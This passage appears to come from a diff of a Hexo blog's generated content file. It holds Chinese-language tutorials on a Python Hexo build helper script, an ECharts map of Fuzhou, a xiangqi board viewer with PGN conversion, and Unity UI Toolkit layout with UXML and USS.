    if os.path.isdir(src_item):
    move_non_md_files(src_item, dst_item)
    # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
    elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
    shutil.move(src_item, dst)


    print("处理文件……")
    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
    item_path = os.path.join('../source', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    move_non_md_files(item_path, os.path.join('../temp',item))
    except Exception as e:
    print(item_path + ":", e)

    print("完成!")

    hexo cl & hexo g

    ​使用 python 调用 hexo clhexo g 命令。

    1
    2
    3
    4
    5
    6
    print("hexo cl……")
    print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")
    print("hexo g……")
    print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")

    后处理

    ​下面这段代码会将 temp/ 下的文件拷贝回 source/public/ 下的对应位置,最后删除 temp/

    后处理 _posts

    ​对于 _posts 下的文件,temp/public/ 的路径不是一一对应的,要按照对应的规则拷贝。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    print("后处理 _post 文件……")

    md_list = []
    for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
    md_list.append(item)

    for item in tqdm(md_list):
    try:
    # 读取 Markdown 文件内容
    with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
    content = file.read()
    # 解析 YAML 头部信息
    yaml_header, body = content.split('---\n', 2)[1:]
    yaml_data = yaml.safe_load(yaml_header)
    source_folder = '../temp/_posts/' + item[:-3]
    destination_folder = ('../public/' +
    str(yaml_data['date'].year).zfill(2) + '/' +
    str(yaml_data['date'].month).zfill(2) + '/' +
    str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
    shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
    try:
    shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
    print("完成!")

    后处理其它文件

    ​对于 _posts 下的文件,temp/public/ 的路径一一对应的,要按拷贝回去。最后把临时文件夹 temp/ 删了。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
print("后处理其它文件……")
for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
        item_path = os.path.join('../temp', item)
        # Only process directories
        if os.path.isdir(item_path):
            try:
                shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../public', item) + ":", e)
            try:
                shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../source', item) + ":", e)

if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

print("完成!")

Complete code

import os
import shutil
from tqdm import tqdm
import subprocess
import yaml

ignore_folder = ['musics']
ignore_type = ['md', 'ejs']


def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # Walk every file and subfolder in the source folder
    for item in os.listdir(src):
        # Full path of the source item
        src_item = os.path.join(src, item)
        # Full path of the destination item
        dst_item = os.path.join(dst, item)

        # Recurse into subfolders
        if os.path.isdir(src_item):
            move_non_md_files(src_item, dst_item)
        # Move regular files whose extension is not in ignore_type
        elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
            shutil.move(src_item, dst)


print("处理文件……")
if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
        item_path = os.path.join('../source', item)
        # Only recurse into directories
        if os.path.isdir(item_path):
            try:
                move_non_md_files(item_path, os.path.join('../temp', item))
            except Exception as e:
                print(item_path + ":", e)

print("完成!")

#####################################################

print("hexo cl……")
print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("完成!")
print("hexo g……")
print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("完成!")

######################################################

## Post-process the _posts files

print("后处理 _post 文件……")

md_list = []
for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
        md_list.append(item)

for item in tqdm(md_list):
    try:
        # Read the Markdown file
        with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
            content = file.read()
        # Parse the YAML front matter
        yaml_header, body = content.split('---\n', 2)[1:]
        yaml_data = yaml.safe_load(yaml_header)
        source_folder = '../temp/_posts/' + item[:-3]
        destination_folder = ('../public/' +
                              str(yaml_data['date'].year).zfill(2) + '/' +
                              str(yaml_data['date'].month).zfill(2) + '/' +
                              str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
        shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): " + item + ":", e)
    try:
        shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
print("完成!")

## Post-process the other files

print("后处理其它文件……")
for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
        item_path = os.path.join('../temp', item)
        # Only process directories
        if os.path.isdir(item_path):
            try:
                shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../public', item) + ":", e)
            try:
                shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../source', item) + ":", e)

if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

print("完成!")

Calling the Python file

Write a .bat file to launch quick_complie.py quickly.

    @echo off
    python quick_complie.py
    echo 按任意键继续……
    pause
    exit
    ]]>
@@ -2413,7 +2413,7 @@ /posts/Web-ECharts%20%E5%9C%B0%E5%9B%BE%E5%8F%AF%E8%A7%86%E5%8C%96/
+ Resources

Demo

福州市

Creating the map

Getting the SVG

福州市.svg

Grab 福州市.svg from the DataV.GeoAtlas geographic toolkit (aliyun.com).

Ai

Import 福州市.svg into Ai for some cleanup.

Document setup

Set the artboard units to pixels. To keep the texture sharp, the artboard here is set to 5000px x 3000px.

Adjusting the image

Delete the fills inside the map, then free-transform it so it sits centered on the artboard and as large as possible.

Save As

Save as SVG with these settings.

Editing

Edit the exported SVG source and change every id to name; only then can ECharts recognize the regions.
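A minimal sketch of that rename in Python, assuming the exported file uses plain double-quoted id="..." attributes (adjust the pattern if yours differ):

import re

# Read the SVG exported from Ai
with open('福州市.svg', 'r', encoding='utf-8') as f:
    svg = f.read()

# Rename the attribute itself, leaving each value untouched
svg = re.sub(r'\bid="', 'name="', svg)

with open('福州市.svg', 'w', encoding='utf-8') as f:
    f.write(svg)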

PS

Export two more PNGs from Ai to make the PS work easier!

png

First, export one PNG directly.

png

Then fill each district with its own color and export a second PNG (it really looks like the mask from a segmentation task).

webp

From the two PNGs exported by Ai, build the background texture in PS.
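If only the final format conversion matters (the compositing itself is still PS work), Pillow can produce the WebP; 'Fuzhou.png' and the quality value here are illustrative, not from the original post:

from PIL import Image

# Convert the composited texture to WebP for the page
Image.open('Fuzhou.png').save('Fuzhou.webp', quality=90)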

HTML

Create a container:

<div id="chart" style="width: 100%; height: 400px; margin: 0 auto; margin-top: 1em; margin-bottom: 1em;"></div>

Import ECharts in the JS:

<script src="XXX/echarts.min.js"></script>

Then write some JS to drive this <div id="chart"></div> (I am still not fluent at this, so I copied from others, read the official docs, asked ChatGPT, and pieced together the smelly code below):

var dom = document.getElementById('chart');
var myChart = echarts.init(dom, null, {
    renderer: 'canvas',
    useDirtyRect: false
});
var app = {};
var option;

var img = new Image();
img.src = 'Fuzhou.webp';

img.onload = function () {
    $.get(
        'Fuzhou.svg',
        function (svg) {
            echarts.registerMap('sicily', { svg: svg });
            option = {
                tooltip: {},
                geo: [
                    {
                        map: 'sicily',
                        roam: true,
                        layoutCenter: ['50%', '50%'],
                        layoutSize: '150%',
                        selectedMode: 'single',
                        itemStyle: {
                            color: undefined
                        },
                        emphasis: {
                            itemStyle: {
                                color: 'rgba(0, 255, 255, 0.25)',
                            },
                            label: {
                                show: false
                            }
                        },

                        regions: [
                            {
                                // Name of the map region
                                name: "福州市",
                                // Polygon style for this region
                                itemStyle: {
                                    areaColor: {
                                        type: 'image',
                                        image: img,
                                        repeat: 'no-repeat',
                                    },
                                    borderColor: '#111',
                                    // Blur radius of the shape's shadow
                                    shadowBlur: 5,
                                    // Shadow color
                                    shadowColor: "#000",
                                    // Vertical shadow offset
                                    shadowOffsetY: 5,
                                    // Opacity
                                    opacity: 1
                                },
                                emphasis: {
                                    itemStyle: {
                                        areaColor: {
                                            type: 'image',
                                            image: img,
                                            repeat: 'no-repeat',
                                        },
                                        borderColor: '#111',
                                        shadowBlur: 5,
                                        shadowColor: "#000",
                                        shadowOffsetY: 5,
                                        opacity: 1
                                    },
                                },
                                tooltip: {
                                    show: true,
                                    confine: true,
                                    formatter: function () {
                                        return [];
                                    }
                                }
                            },
                            {
                                name: "鼓楼区",
                                tooltip: {
                                    show: true,
                                    confine: true,
                                    formatter: function () {
                                        return [
                                            '鼓楼区',
                                            '啊!三坊七巷真是太好玩了!'
                                        ].join('<br/>');
                                    }
                                }
                            },
                            {
                                name: "仓山区",
                                tooltip: {
                                    show: true,
                                    confine: true,
                                    formatter: function () {
                                        return [
                                            '仓山区',
                                            '我们的时代多美好~像朝霞漫天灿烂~'
                                        ].join('<br/>');
                                    }
                                }
                            },
                            {
                                name: "闽侯县",
                                tooltip: {
                                    show: true,
                                    confine: true,
                                    formatter: function () {
                                        return [
                                            '闽侯县',
                                            '知明行笃~立诚致广~全面求发展~'
                                        ].join('<br/>');
                                    }
                                }
                            },
                            {
                                name: "长乐区",
                                tooltip: {
                                    show: true,
                                    confine: true,
                                    formatter: function () {
                                        return [
                                            '长乐区',
                                            '闽江江水都流向~流向长乐的海~'
                                        ].join('<br/>');
                                    }
                                }
                            },
                        ]
                    }
                ],
            };
            myChart.setOption(option);
            myChart.on('selectchanged', function (params) {
                if (!params.selected.length) {
                    myChart.dispatchAction({
                        type: 'hideTip'
                    });
                    myChart.dispatchAction({
                        type: 'geoSelect',
                        geoIndex: 0
                        // Use no name to unselect.
                    });
                } else {
                    var btnDataIdx = params.selected[0].dataIndex[0];
                    var name = option.series.data[btnDataIdx][2];
                    myChart.dispatchAction({
                        type: 'geoSelect',
                        geoIndex: 0,
                        name: name
                    });
                    myChart.dispatchAction({
                        type: 'showTip',
                        geoIndex: 0,
                        name: name
                    });
                }
            });
        }
    );

    if (option && typeof option === 'object') {
        myChart.setOption(option);
    }

    myChart.on('click', function (params) {
        // Log the click event of the selected item
        console.log("选中项: ", params.event);
    });

    window.addEventListener('resize', myChart.resize);
};
    ]]>
@@ -2469,7 +2469,7 @@ /posts/Web-xiangqiJS/
+ Resources

Code

Quick start

Creating a board only needs xiangqiboard.js; download the source from the source download page and include it in the page:

    <link rel="stylesheet" type="text/css" href="css/xiangqiboard-0.3.3.css">
    <script type="text/javascript" src="js/xiangqiboard-0.3.3.min.js"></script>

On this blog, to make the code more reusable, the image assets are kept at a fixed location, and the config is set to point there:

const test_config = {
    boardTheme: '../../../../js/xiangqiboard/img/xiangqiboards/wikimedia/xiangqiboard.svg',
    pieceTheme: '../../../../js/xiangqiboard/img/xiangqipieces/wikimedia/{piece}.svg',
    position: 'start'
};

Create the board:

    <div id="board1" style="margin: 0 auto; width: min(450px, 100%); overflow: auto;"></div>
    <script>const board1 = Xiangqiboard('board1', test_config)</script>

Game record display

圣光将赐予我胜利!

Implementation details

Include xiangqi.js from the source download page:

    <script type="text/javascript" src="/js/xiangqi.js"></script>

Add the highlight CSS:

.highlight-red {
    box-shadow: inset 0 0 3px 3px yellow;
}
.highlight-black {
    box-shadow: inset 0 0 3px 3px blue;
}

Draw a board, write a board.js to drive it, and add a few helper controls!

    <div id="board" style="margin: 0 auto; width: min(450px, 100%); overflow: auto;"></div>

    <div id="board-tool" style="margin: 10px auto 5px; width: 450px; display: flex;">
    <button id="start">初局</button>
    <button id="prev">前一步</button>
    <p id="description">圣光将赐予我胜利!</p>
    <button id="next">后一步</button>
    <button id="end">终局</button>
    </div>

    <script type="text/javascript" src="board.js"></script>

The contents of board.js:

let board = null;
let $board = $('#board');
let squareClass = 'square-2b8ce';

let colorToHighlight = null;
let highlightChess = true;
let squareToHighlight = null;

var $boardTool = $("#board-tool");
var $prevButton = $boardTool.find("#prev");
var $description = $boardTool.find("#description");
var $nextButton = $boardTool.find("#next");
var $startButton = $boardTool.find("#start");
var $endButton = $boardTool.find("#end");

var totalSteps = 0;

var game = new Xiangqi();

const pgn = ['[Game "Chinese Chess"]',
    '[Event "Test"]',
    '[Date "2024.04.16"]',
    '[Red "A"]',
    '[Black "B"]',
    '[Result "1/2-1/2"]',
    '[Format "ICCS"]',
    '',
    '1. b2e2 b9c7',
    '2. b0c2 a9b9',
    '3. a0b0 h9g7',
    '4. g3g4 c6c5',
    '5. h0g2 h7h3',
    '6. e3e4 b7b3',
    '7. i0i1 h3g3',
    '8. g0i2 i9h9',
    '9. i1f1 g3d3',
    '10. f1f7 d3d2',
    '11. g2f4 d2h2',
    '12. f4e6 c7e6',
    '13. e2e6 b9b6',
    '14. e6e5 e9e8',
    '15. f7g7 h9h3',
    '16. g7g9'];

function initXiangqi() {
    console.log("载入 PGN:" + game.load_pgn(pgn.join('\n')), game.header());
    totalSteps = game.history().length;
    do {
        flag = game.undo();
    } while (flag);
}

function initXiangqiboard() {
    function onMoveEnd() {
        if (highlightChess) {
            $board.find('.square-' + squareToHighlight)
                .addClass('highlight-' + colorToHighlight);
        }
    }

    let config = {
        boardTheme: '../../../../js/xiangqiboard/img/xiangqiboards/wikimedia/xiangqiboard.svg',
        pieceTheme: '../../../../js/xiangqiboard/img/xiangqipieces/wikimedia/{piece}.svg',
        position: game.fen(),
        draggable: true,
        onMoveEnd: onMoveEnd
    };

    board = Xiangqiboard($board, config);
}

function initXiangqiboardTool() {
    $startButton.click(function () {
        console.log("初始按钮被点击了");
        do {
            move = game.undo();
            removehighlight(move);
        } while (move);

        board.position(game.fen());
        $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $endButton.click(function () {
        console.log("终局按钮被点击了");
        do {
            move = game.redo();
            removehighlight(move);
        } while (move);

        board.position(game.fen());
        $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $prevButton.click(function () {
        console.log("前一步按钮被点击了");
        move = game.undo();
        highlight(move);
        board.position(game.fen());
        $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $nextButton.click(function () {
        console.log("后一步按钮被点击了");
        move = game.redo();
        highlight(move);
        board.position(game.fen());
        $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    function removehighlight(move) {
        console.log(move);
        $board.find('.' + squareClass).removeClass('highlight-red');
        $board.find('.' + squareClass).removeClass('highlight-black');
        highlightChess = false;
    }

    function highlight(move) {
        console.log(move);
        if (move) {
            if (move.color === 'r') {
                $board.find('.' + squareClass).removeClass('highlight-red');
                $board.find('.square-' + move.from).addClass('highlight-red');
                squareToHighlight = move.to;
                colorToHighlight = 'red';
            } else {
                $board.find('.' + squareClass).removeClass('highlight-black');
                $board.find('.square-' + move.from).addClass('highlight-black');
                squareToHighlight = move.to;
                colorToHighlight = 'black';
            }
            highlightChess = true;
        }
    }
}

$(document).ready(function () {
    initXiangqi();
    initXiangqiboard();
    initXiangqiboardTool();
});
• initXiangqi(); initializes the chess move logic.
• initXiangqiboard(); initializes the board logic.
• initXiangqiboardTool(); initializes the helper-tool logic.

Handling the PGN format

xiangqi.js's load_pgn() seems to expect a somewhat different PGN layout:

Loading a PGN generated by 象棋巫师 (Xiangqi Wizard) or downloaded elsewhere fails outright; the file first has to be massaged with Python-Chinese-Chess!


Take XXX.PGN, a game 象棋巫师 played at random:

    [Game "Chinese Chess"]
    [Event ""]
    [Round ""]
    [Date ""]
    [Site ""]
    [RedTeam ""]
    [Red ""]
    [BlackTeam ""]
    [Black ""]
    [Result "*"]
    [ECCO "C04"]
    [Opening "中炮七路马对屏风马"]
    [Variation "红进中兵对黑双炮过河"]
    1. 炮八平五 马2进3
    2. 马八进七 车1平2
    3. 车九平八 马8进7
    4. 兵三进一 卒3进1
    5. 马二进三 炮8进4
    6. 兵五进一 炮2进4
    7. 车一进一 炮8平7
    8. 相三进一 车9平8
    9. 车一平四 炮7平4
    10. 车四进六 炮4进1
    11. 马三进四 炮4平8
    12. 马四进五 马3进5
    13. 炮五进四 车2进3
    14. 炮五退一 将5进1
    15. 车四平三 车8进6
    16. 车三进二 *
    ======================
    欢迎访问象棋百科全书网
    推荐用象棋巫师观赏棋谱
    http://www.xqbase.com/

The conversion code that turns the PGN above into the format xiangqi.js recognizes:

import cchess

board = cchess.Board.from_pgn("XXX.PGN")  # the PGN format exported by 象棋巫师

# Header tags; edit these yourself
pgn = """[Game "Chinese Chess"]
[Event "Test"]
[Date "2024.04.16"]
[Red "A"]
[Black "B"]
[Result "*"]
[Format "ICCS"]

"""

for s in board.to_pgn(format="ICCS").split('\n'):
    if s.startswith('[Gen'):
        start_fen = s.split(' ')[1][1:]
    elif not s.startswith('['):
        # Lower-case the moves, drop the dashes, and put a space after the move number
        temp = '. '.join(s.lower().replace("-", "").split('.'))
        pgn += temp + '\n'
pgn.split('\n')[:-1]

Jupyter Notebook output:

    ['[Game "Chinese Chess"]',
    '[Event "Test"]',
    '[Date "2024.04.16"]',
    '[Red "A"]',
    '[Black "B"]',
    '[Result "1/2-1/2"]',
    '[Format "ICCS"]',
    '',
    '1. b2e2 b9c7',
    '2. b0c2 a9b9',
    '3. a0b0 h9g7',
    '4. g3g4 c6c5',
    '5. h0g2 h7h3',
    '6. e3e4 b7b3',
    '7. i0i1 h3g3',
    '8. g0i2 i9h9',
    '9. i1f1 g3d3',
    '10. f1f7 d3d2',
    '11. g2f4 d2h2',
    '12. f4e6 c7e6',
    '13. e2e6 b9b6',
    '14. e6e5 e9e8',
    '15. f7g7 h9h3',
    '16. g7g9']
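The expression above only displays the converted list; to feed board.js the result still has to be persisted somewhere. A minimal sketch, with the hypothetical output name converted.pgn:

# Write the converted record to disk; from there it can be pasted into
# the `pgn` array in board.js.
with open('converted.pgn', 'w', encoding='utf-8') as f:
    f.write(pgn)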
    ]]>
    @@ -2579,7 +2579,7 @@ /posts/Paper-%E7%BB%84%E4%BC%9A%E6%B1%87%E6%8A%A5/ -
    ]]>
    +
    ]]>
@@ -2631,7 +2631,7 @@ /posts/Unity-UI%20Toolkit/ - Body

    Unity UI Toolkit Beginner’s Guide 1: Layout & Style

    ​IMGUI → UGUI → UI Toolkit

UI Toolkit is Unity's next-generation UI!

        Style   Structure & Layout   Interactions
Web     CSS     HTML                 JavaScript
Unity   USS     UXML                 C#

UI Toolkit borrows its ideas from web front-end development, introducing the two concepts of USS and UXML.

    png

Create a UI Document in the Project window to get a UXML file.

    png

Create a UI Document in the Hierarchy and bind its Panel Settings and Source Asset.

    png

Open the UXML; the editor feels a bit like Dreamweaver? Set Unity Default Runtime Theme, Match Game View, and Canvas Background.

    png

After some fiddling: a VisualElement is the analogue of a web <div>, except it only supports display: flex; a Label is the analogue of <p>.

    png

For the font, you can use the Font Asset Creator. It looks impressive! I have not fully figured it out yet.

    png

Everything so far has been inline styles, which is not great. Create a StyleSheet to hold proper style rules, then bind it in each element's Style Class List.

The resulting UXML file:

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement style="background-color: rgba(255, 0, 0, 0); width: auto; height: 100%; position: relative; align-items: flex-start;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgba(255, 255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 20px; padding-top: 20px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&#10;&#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 24px; margin-left: 20px; margin-right: 20px; margin-top: 20px; margin-bottom: 20px; padding-left: 60px; padding-right: 60px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

The USS file:

.button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgba(255, 255, 255, 255);
    background-color: rgba(0, 102, 255, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
}

.button-blue:hover {
    scale: 1.1 1.1;
}

    Unity UI Toolkit Beginner’s Guide 2: Animating Interaction

    png

UI Toolkit supports both Relative and Absolute positioning.

    png

With Flex, elements shrink when the container is too small.

    png

Build a UI like this one, and switch what is shown by adding classes to elements.

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" style="flex-grow: 1; background-color: rgba(0, 0, 0, 0.75);" />
    <ui:VisualElement style="bottom: 0; height: 50%; width: 100%; position: absolute; border-top-left-radius: 40px; border-bottom-left-radius: 0; border-top-right-radius: 40px; border-bottom-right-radius: 0; background-color: rgb(255, 255, 255); align-items: center; padding-left: 50px; padding-right: 50px; padding-top: 50px; padding-bottom: 50px;">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement style="background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&amp;guid=c9c505e591b63904a901936e91e0ae2a&amp;type=3#Hyperspace - Projector&apos;); width: 438px; height: 400px;" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" class="textparagraph" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

.button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
